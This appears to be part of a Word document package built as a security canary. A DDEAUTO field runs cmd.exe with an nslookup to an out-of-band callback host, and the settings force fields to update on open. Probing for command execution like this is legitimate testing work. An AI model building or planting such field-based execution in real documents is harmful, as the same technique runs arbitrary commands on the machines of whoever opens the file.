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t>MSOBB Word Online DDEAUTO execution canary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:dirty="true"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO "C:\Windows\System32\cmd.exe" "/c nslookup dde.d9vh6w.oast.me" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>MSOBB-DDE-NOT-EXECUTED</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr/>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:updateFields w:val="true"/>
</w:settings>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rIdSettings" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
</Relationships>
</file>